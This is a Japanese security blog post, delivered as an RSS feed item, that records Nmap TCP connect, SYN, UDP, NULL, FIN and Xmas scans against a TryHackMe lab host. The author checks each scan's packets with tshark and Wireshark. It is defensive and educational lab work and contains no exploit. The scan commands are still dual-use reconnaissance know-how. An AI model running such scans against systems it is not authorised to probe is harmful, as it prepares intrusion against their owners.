<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>TryHackMe &#8211; セキュリティエンジニアの雑多ブログ</title>
	<atom:link href="https://cybermemo.blog/category/security/tryhackme/feed" rel="self" type="application/rss+xml" />
	<link>https://cybermemo.blog</link>
	<description>セキュリティエンジニアの学習記録</description>
	<lastBuildDate>Sun, 26 Oct 2025 07:50:13 +0000</lastBuildDate>
	<language>ja</language>
	<sy:updatePeriod>
	hourly	</sy:updatePeriod>
	<sy:updateFrequency>
	1	</sy:updateFrequency>
	<generator>https://wordpress.org/?v=6.9.1</generator>

<image>
	<url>https://cybermemo.blog/wp-content/uploads/2025/10/cropped-トップアイコン-32x32.jpg</url>
	<title>TryHackMe &#8211; セキュリティエンジニアの雑多ブログ</title>
	<link>https://cybermemo.blog</link>
	<width>32</width>
	<height>32</height>
</image> 
	<item>
		<title>Nmapでポートスキャンをしてみる</title>
		<link>https://cybermemo.blog/nmap-port-scan</link>
					<comments>https://cybermemo.blog/nmap-port-scan#respond</comments>
		
		<dc:creator><![CDATA[miyuki]]></dc:creator>
		<pubDate>Sun, 26 Oct 2025 07:50:12 +0000</pubDate>
				<category><![CDATA[TryHackMe]]></category>
		<category><![CDATA[コマンド]]></category>
		<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[Nmap]]></category>
		<category><![CDATA[tshark]]></category>
		<category><![CDATA[Wireshark]]></category>
		<category><![CDATA[ポートスキャン]]></category>
		<guid isPermaLink="false">https://cybermemo.blog/?p=540</guid>

					<description><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/10/コマンド用アイキャッチ.jpg" class="webfeedsFeaturedVisual" /></p>はじめに Nmapで実際にポートスキャンをしてみた。検証環境は TryHackMe の Nmap ルーム。 本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。必ず許可された演習環境でのみ実践してく [&#8230;]]]></description>
										<content:encoded><![CDATA[<p><img src="https://cybermemo.blog/wp-content/uploads/2025/10/コマンド用アイキャッチ.jpg" class="webfeedsFeaturedVisual" /></p>
<h2 class="wp-block-heading">はじめに</h2>



<p>Nmapで実際にポートスキャンをしてみた。<br>検証環境は TryHackMe の Nmap ルーム。</p>


<div class="swell-block-postLink">			<div class="p-blogCard -external" data-type="type3" data-onclick="clickLink">
				<div class="p-blogCard__inner">
					<span class="p-blogCard__caption">TryHackMe</span>
					<div class="p-blogCard__thumb c-postThumb"><figure class="c-postThumb__figure"><img decoding="async" src="https://tryhackme-images.s3.amazonaws.com/room-icons/5d653d7a4e8a1a6d98379168cfc30ac0.png" alt="" class="c-postThumb__img u-obf-cover" width="320" height="180"></figure></div>					<div class="p-blogCard__body">
						<a class="p-blogCard__title" href="https://tryhackme.com/room/furthernmap" target="_blank" rel="noopener noreferrer">Nmap</a>
						<span class="p-blogCard__excerpt">An in depth look at scanning with Nmap, a powerful network scanning tool.</span>					</div>
				</div>
			</div>
		</div>


<p class="is-style-icon_info"><strong>本記事の内容は教育目的のみに記載しています。実環境での悪用は犯罪行為です。必ず許可された演習環境でのみ実践してください。</strong></p>



<h2 class="wp-block-heading">TCPスキャン</h2>



<p>使用頻度上位 100 ポートのみ（&#8211;top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して<br>TCPスキャン（-sT）。</p>



<pre class="wp-block-code"><code>$ sudo nmap -sT --top-ports 100 -vv -Pn target ip</code></pre>



<p>openポートを発見。</p>



<pre class="wp-block-code"><code>Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-23 23:57 JST
Initiating Parallel DNS resolution of 1 host. at 23:57
Completed Parallel DNS resolution of 1 host. at 23:57, 0.00s elapsed
Initiating Connect Scan at 23:57
Scanning target ip &#91;100 ports]
Discovered open port 3389/tcp on target ip
Discovered open port 135/tcp on target ip
Discovered open port 80/tcp on target ip
Discovered open port 21/tcp on target ip
Discovered open port 53/tcp on target ip
Completed Connect Scan at 23:57, 7.02s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.37s latency).
Scanned at 2025-10-23 23:57:10 JST for 7s
Not shown: 95 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
<strong><mark style="background-color:rgba(0, 0, 0, 0)" class="has-inline-color has-swl-deep-01-color">21/tcp   open  ftp           syn-ack
53/tcp   open  domain        syn-ack
80/tcp   open  http          syn-ack
135/tcp  open  msrpc         syn-ack
3389/tcp open  ms-wbt-server syn-ack</mark></strong>

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 7.03 seconds</code></pre>



<p>tshark でログを取っていたので確認してみる。</p>



<pre class="wp-block-code"><code># tshark の結果を sT_result.txt へ出力
$ sudo tshark -i tun0 > sT_result.txt 
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
237 ^C</code></pre>



<pre class="wp-block-code"><code># cat で全体のログを確認
$ cat sT_result.txt             
    1 0.000000000   host ip → target ip TCP 60 34450 → 111 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    2 0.000013296   host ip → target ip TCP 60 47774 → 113 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    3 0.000018708   host ip → target ip TCP 60 38474 → 135 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    4 0.000025294   host ip → target ip TCP 60 55670 → 5900 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    5 0.000030624   host ip → target ip TCP 60 46124 → 25 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    6 0.000035786   host ip → target ip TCP 60 59490 → 554 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    7 0.000041544   host ip → target ip TCP 60 38960 → 3306 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    8 0.000048233   host ip → target ip TCP 60 57882 → 110 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
    9 0.000052118   host ip → target ip TCP 60 42396 → 3389 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
   10 0.000059820   host ip → target ip TCP 60 37896 → 8888 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245774735 TSecr=0 WS=128
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   12 0.377390839   host ip → target ip TCP 40 38474 → 135 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
   13 0.378715797   host ip → target ip TCP 40 38474 → 135 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   14 0.378932212   host ip → target ip TCP 60 47616 → 23 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775114 TSecr=0 WS=128
   15 0.378957703   host ip → target ip TCP 60 43838 → 995 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775114 TSecr=0 WS=128
   16 1.027607473   host ip → target ip TCP 60 &#91;TCP Retransmission] 37896 → 8888 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245775763 TSecr=0 WS=128
（省略）</code></pre>



<p>ログを絞って確認。</p>



<pre class="wp-block-code"><code># SYN 以外のログで絞ってみる
$ cat sT_result.txt | grep -v -F "&#91;SYN]"
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   12 0.377390839   host ip → target ip TCP 40 38474 → 135 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
   13 0.378715797   host ip → target ip TCP 40 38474 → 135 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   28 2.268681269 target ip → host ip   TCP 52 135 → 38490 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   29 2.268724628   host ip → target ip TCP 40 38490 → 135 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
   30 2.268783378   host ip → target ip TCP 40 38490 → 135 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   62 3.272698420   host ip → target ip TCP 40 43260 → 21 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
   63 3.273334678 target ip → host ip   TCP 52 53 → 58022 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   64 3.273357934   host ip → target ip TCP 40 58022 → 53 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
   65 3.273693028   host ip → target ip TCP 40 43260 → 21 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   66 3.274013386   host ip → target ip TCP 40 58022 → 53 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   77 3.274796974 target ip → host ip   TCP 52 80 → 49068 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   78 3.274865411   host ip → target ip TCP 40 49068 → 80 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
   79 3.274951087   host ip → target ip TCP 40 49068 → 80 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
   84 3.387604406 target ip → host ip   TCP 52 3389 → 42396 &#91;SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
   85 3.387628199   host ip → target ip TCP 40 42396 → 3389 &#91;RST] Seq=1 Win=0 Len=0
  150 4.998246831 target ip → host ip   TCP 52 135 → 38502 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  151 4.998329872   host ip → target ip TCP 40 38502 → 135 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
  152 4.998587904   host ip → target ip TCP 40 38502 → 135 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0
  232 6.277318520 target ip → host ip   TCP 52 3389 → 42398 &#91;SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  233 6.277337412   host ip → target ip TCP 40 42398 → 3389 &#91;RST] Seq=1 Win=0 Len=0
  235 6.857444881 target ip → host ip   TCP 52 135 → 38504 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  236 6.857524021   host ip → target ip TCP 40 38504 → 135 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
  237 6.858089282   host ip → target ip TCP 40 38504 → 135 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0

# SYN/ACK（open）で絞ってみる
$ cat sT_result.txt | grep -F "&#91;SYN, ACK]"
   11 0.377319586 target ip → host ip   TCP 52 135 → 38474 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   28 2.268681269 target ip → host ip   TCP 52 135 → 38490 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   63 3.273334678 target ip → host ip   TCP 52 53 → 58022 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   77 3.274796974 target ip → host ip   TCP 52 80 → 49068 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   84 3.387604406 target ip → host ip   TCP 52 3389 → 42396 &#91;SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  150 4.998246831 target ip → host ip   TCP 52 135 → 38502 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
  232 6.277318520 target ip → host ip   TCP 52 3389 → 42398 &#91;SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288 WS=1 SACK_PERM
  235 6.857444881 target ip → host ip   TCP 52 135 → 38504 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM

# openポートの確認
$ cat sT_result.txt | grep -F "&#91;SYN, ACK]" | awk '{print $8}' | sort -n -u
21
53
80
135
3389</code></pre>



<p>SYN/ACK を返しているポートが open と判定されており、nmap のスキャン結果と tshark のログが一致していることが確認できた。</p>



<p>最後に、awk を使って TCP ハンドシェイク（SYN → SYN/ACK → ACK）が実際に成立しているかを確認してみる。</p>



<pre class="wp-block-code"><code>$ awk '    
  # 行中の「&lt;num> → &lt;num>」を1組だけ抜き出す
  match($0, /&#91;&#91;:space:]](&#91;0-9]+)&#91;&#91;:space:]]*→&#91;&#91;:space:]]*(&#91;0-9]+)&#91;&#91;:space:]]/, m) {
    if (m&#91;1]==21 || m&#91;2]==21) print  
  }      
' sT_result.txt
   52 2.896504834   host ip → target ip TCP 60 43260 → 21 &#91;SYN] Seq=0 Win=64240 Len=0 MSS=1460 SACK_PERM TSval=245777632 TSecr=0 WS=128
   61 3.272603426 target ip → host ip   TCP 52 21 → 43260 &#91;SYN, ACK] Seq=0 Ack=1 Win=65535 Len=0 MSS=1288 WS=256 SACK_PERM
   62 3.272698420   host ip → target ip TCP 40 43260 → 21 &#91;ACK] Seq=1 Ack=1 Win=64256 Len=0
   65 3.273693028   host ip → target ip TCP 40 43260 → 21 &#91;RST, ACK] Seq=1 Ack=1 Win=64256 Len=0</code></pre>



<p>TCP ハンドシェイクが成立していることが分かる。</p>



<h2 class="wp-block-heading">SYNスキャン（ハーフオープンスキャン）</h2>



<p>使用頻度上位 100 ポートのみ（&#8211;top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して<br>SYNスキャン（-sS）。</p>



<pre class="wp-block-code"><code>$ sudo nmap -sS --top-ports 100 -vv -Pn target ip</code></pre>



<p>openポートを発見。</p>



<pre class="wp-block-code"><code>Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 13:06 JST
Initiating Parallel DNS resolution of 1 host. at 13:06
Completed Parallel DNS resolution of 1 host. at 13:06, 0.00s elapsed
Initiating SYN Stealth Scan at 13:06
Scanning target ip &#91;100 ports]
Discovered open port 80/tcp on target ip
Discovered open port 21/tcp on target ip
Discovered open port 3389/tcp on target ip
Discovered open port 135/tcp on target ip
Discovered open port 53/tcp on target ip
Completed SYN Stealth Scan at 13:06, 6.14s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.34s latency).
Scanned at 2025-10-26 13:06:36 JST for 7s
Not shown: 95 filtered tcp ports (no-response)
PORT     STATE SERVICE       REASON
<strong><mark style="background-color:rgba(0, 0, 0, 0)" class="has-inline-color has-swl-deep-01-color">21/tcp   open  ftp           syn-ack ttl 124
53/tcp   open  domain        syn-ack ttl 124
80/tcp   open  http          syn-ack ttl 124
135/tcp  open  msrpc         syn-ack ttl 124
3389/tcp open  ms-wbt-server syn-ack ttl 124</mark></strong>

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.20 seconds
           Raw packets sent: 197 (8.668KB) | Rcvd: 7 (308B)</code></pre>



<p>今度は pcap でログを取ってみる。</p>



<pre class="wp-block-code"><code>$ sudo tshark -i tun0 -w /tmp/Ss_result.pcap                                 
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
211 ^C</code></pre>



<pre class="wp-block-code"><code># tshark で全体のログを確認
$ sudo tshark -r Ss_result.pcap                     
Running as user "root" and group "root". This could be dangerous.
    1 0.000000000   host ip → target ip TCP 44 63626 → 993 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    2 0.000010601   host ip → target ip TCP 44 63626 → 445 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    3 0.000011875   host ip → target ip TCP 44 63626 → 110 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    4 0.000012902   host ip → target ip TCP 44 63626 → 23 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    5 0.000013856   host ip → target ip TCP 44 63626 → 111 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    6 0.000014615   host ip → target ip TCP 44 63626 → 80 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    7 0.000015329   host ip → target ip TCP 44 63626 → 3389 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    8 0.000016047   host ip → target ip TCP 44 63626 → 113 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
    9 0.000016757   host ip → target ip TCP 44 63626 → 21 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
   10 0.000017461   host ip → target ip TCP 44 63626 → 587 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
   11 0.338039856 target ip → host ip   TCP 44 80 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   12 0.338076236   host ip → target ip TCP 40 63626 → 80 &#91;RST] Seq=1 Win=0 Len=0
   13 0.338747181 target ip → host ip   TCP 44 21 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip TCP 40 63626 → 21 &#91;RST] Seq=1 Win=0 Len=0
   15 0.339557912 target ip → host ip   TCP 44 3389 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   16 0.339571791   host ip → target ip TCP 40 63626 → 3389 &#91;RST] Seq=1 Win=0 Len=0
(省略)</code></pre>



<p>ログを絞って確認。</p>



<pre class="wp-block-code"><code># SYN 以外のログで絞ってみる
$ sudo tshark -r sS_result.pcap -Y "not (tcp.flags.syn==1 &amp;&amp; tcp.flags.ack==0)"
Running as user "root" and group "root". This could be dangerous.
   11 0.338039856 target ip8 → host ip   TCP 44 80 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   12 0.338076236   host ip → target ip8 TCP 40 63626 → 80 &#91;RST] Seq=1 Win=0 Len=0
   13 0.338747181 target ip8 → host ip   TCP 44 21 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip8 TCP 40 63626 → 21 &#91;RST] Seq=1 Win=0 Len=0
   15 0.339557912 target ip8 → host ip   TCP 44 3389 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   16 0.339571791   host ip → target ip8 TCP 40 63626 → 3389 &#91;RST] Seq=1 Win=0 Len=0
   23 0.677269837 target ip8 → host ip   TCP 44 135 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   24 0.677332313   host ip → target ip8 TCP 40 63626 → 135 &#91;RST] Seq=1 Win=0 Len=0
   55 3.165016037 target ip8 → host ip   TCP 44 53 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   56 3.165076706   host ip → target ip8 TCP 40 63626 → 53 &#91;RST] Seq=1 Win=0 Len=0
   57 3.165703655 target ip8 → host ip   TCP 44 80 → 63631 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   58 3.165753573   host ip → target ip8 TCP 40 63631 → 80 &#91;RST] Seq=1 Win=0 Len=0
  173 4.863356730 target ip8 → host ip   TCP 44 80 → 63633 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
  174 4.863426175   host ip → target ip8 TCP 40 63633 → 80 &#91;RST] Seq=1 Win=0 Len=0

# SYN/ACK（open）で絞ってみる
$ sudo tshark -r sS_result.pcap -Y "tcp.flags.syn==1 &amp;&amp; tcp.flags.ack==1"
Running as user "root" and group "root". This could be dangerous.
   11 0.338039856 target ip8 → host ip   TCP 44 80 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   13 0.338747181 target ip8 → host ip   TCP 44 21 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   15 0.339557912 target ip8 → host ip   TCP 44 3389 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64000 Len=0 MSS=1288
   23 0.677269837 target ip8 → host ip   TCP 44 135 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   55 3.165016037 target ip8 → host ip   TCP 44 53 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   57 3.165703655 target ip8 → host ip   TCP 44 80 → 63631 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
  173 4.863356730 target ip8 → host ip   TCP 44 80 → 63633 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288

# openポートの確認
$ sudo tshark -r sS_result.pcap -Y "tcp.flags.syn==1 &amp;&amp; tcp.flags.ack==1" -T fields -e tcp.srcport | sort -n -u
Running as user "root" and group "root". This could be dangerous.
21
53
80
135
3389</code></pre>



<p>SYN/ACK を返しているポートが open になっているので、nmap の結果と tshark のログは一致している。</p>



<p>ハーフオープンスキャン（SYN→SYN/ACK→RST）を本当にしているか確認してみる。</p>



<pre class="wp-block-code"><code>$ sudo tshark -r sS_result.pcap -Y "tcp.port == 21"                            
Running as user "root" and group "root". This could be dangerous.
    9 0.000016757   host ip → target ip TCP 44 63626 → 21 &#91;SYN] Seq=0 Win=1024 Len=0 MSS=1460
   13 0.338747181 target ip → host ip   TCP 44 21 → 63626 &#91;SYN, ACK] Seq=0 Ack=1 Win=64400 Len=0 MSS=1288
   14 0.338809373   host ip → target ip TCP 40 63626 → 21 &#91;RST] Seq=1 Win=0 Len=0</code></pre>



<p>SYN/ACK に対して RST で切断しているため、ハーフオープンスキャンの挙動。</p>



<h2 class="wp-block-heading">UDPスキャン</h2>



<p>使用頻度上位 100 ポートのみ（&#8211;top-ports 100）、スキャン中の詳細を表示（-vv）、pingをスキップ（-Pn）して<br>UDPスキャン（-sU）。</p>



<pre class="wp-block-code"><code>$ sudo nmap -sU --top-ports 100 -vv -Pn target ip</code></pre>



<p>openポートを発見。</p>



<pre class="wp-block-code"><code>Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:03 JST
Initiating Parallel DNS resolution of 1 host. at 14:03
Completed Parallel DNS resolution of 1 host. at 14:03, 0.00s elapsed
Initiating UDP Scan at 14:03
Scanning target ip &#91;100 ports]
Discovered open port 53/udp on target ip
Completed UDP Scan at 14:03, 12.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set (0.36s latency).
Scanned at 2025-10-26 14:03:17 JST for 11s
Not shown: 99 open|filtered udp ports (no-response)
PORT   STATE SERVICE REASON
<strong><mark style="background-color:rgba(0, 0, 0, 0)" class="has-inline-color has-swl-deep-01-color">53/udp open  domain  udp-response ttl 124</mark></strong>

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 12.15 seconds
           Raw packets sent: 261 (16.044KB) | Rcvd: 4 (262B)</code></pre>



<p>pcap でログを取ってみる。</p>



<pre class="wp-block-code"><code>$ sudo tshark -i tun0 -w /tmp/sU_result.pcap                                            
Running as user "root" and group "root". This could be dangerous.
Capturing on 'tun0'
273 ^C</code></pre>



<p>今回は Wireshar でログを確認してみる。</p>



<pre class="wp-block-code"><code>$ sudo wireshark sU_result.pcap  </code></pre>



<p>ip.src == target ip で応答のあったものだけ絞る。</p>



<pre class="wp-block-code"><code>ip.src == target ip &amp;&amp; not icmp</code></pre>



<figure class="wp-block-image size-large"><img decoding="async" width="1024" height="85" src="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark-1024x85.png" alt="Wireshark UDPスキャンの画像" class="wp-image-548" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark-1024x85.png 1024w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark-300x25.png 300w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark-768x64.png 768w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark-1536x128.png 1536w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark.png 1564w" sizes="(max-width: 1024px) 100vw, 1024px" /></figure>



<p>DNS のみ表示されたので、nmap の結果と一致。<br></p>



<h2 class="wp-block-heading">特殊スキャン（NULL／FIN／Xmas）</h2>



<p>検証環境でopenポートが見つからなかったので、今回はフラグだけ確認。</p>



<h3 class="wp-block-heading">NULLスキャン</h3>



<pre class="wp-block-code"><code># NULLスキャン
$ sudo nmap -sN --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:57 JST
Initiating Parallel DNS resolution of 1 host. at 14:57
Completed Parallel DNS resolution of 1 host. at 14:57, 0.00s elapsed
Initiating NULL Scan at 14:57
Scanning target ip &#91;100 ports]
Completed NULL Scan at 14:57, 21.11s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:57:12 JST for 22s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.15 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)</code></pre>



<p>フラグはすべて0。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="502" height="204" src="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_NULL.png" alt="Wireshark NULLスキャンのフラグ画像" class="wp-image-550" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_NULL.png 502w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_NULL-300x122.png 300w" sizes="(max-width: 502px) 100vw, 502px" /></figure>



<h3 class="wp-block-heading">FINスキャン</h3>



<pre class="wp-block-code"><code># FINスキャン
$ sudo nmap -sF --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:52 JST
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.00s elapsed
Initiating FIN Scan at 14:52
Scanning target ip &#91;100 ports]
Completed FIN Scan at 14:52, 21.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:52:08 JST for 21s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.18 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)</code></pre>



<p>FIN = 1。</p>



<figure class="wp-block-image size-full"><img decoding="async" width="510" height="193" src="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_FIN.png" alt="Wireshark FINスキャンのフラグ画像" class="wp-image-551" srcset="https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_FIN.png 510w, https://cybermemo.blog/wp-content/uploads/2025/10/Wireshark_FIN-300x114.png 300w" sizes="(max-width: 510px) 100vw, 510px" /></figure>



<h3 class="wp-block-heading">Xmasスキャン</h3>



<pre class="wp-block-code"><code># Xmasスキャン
$ sudo nmap -sX --top-ports 100 -vv -Pn target ip

Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.95 ( https://nmap.org ) at 2025-10-26 14:52 JST
Initiating Parallel DNS resolution of 1 host. at 14:52
Completed Parallel DNS resolution of 1 host. at 14:52, 0.01s elapsed
Initiating XMAS Scan at 14:52
Scanning target ip &#91;100 ports]
Completed XMAS Scan at 14:53, 21.09s elapsed (100 total ports)
Nmap scan report for target ip
Host is up, received user-set.
Scanned at 2025-10-26 14:52:53 JST for 21s
All 100 scanned ports on target ip are in ignored states.
Not shown: 100 open|filtered tcp ports (no-response)

Read data files from: /usr/share/nmap
Nmap done: 1 IP address (1 host up) scanned in 21.16 seconds
           Raw packets sent: 200 (8.000KB) | Rcvd: 0 (0B)</code></pre>



<p>FIN = 1、PSH = 1、URG = 1。</p>



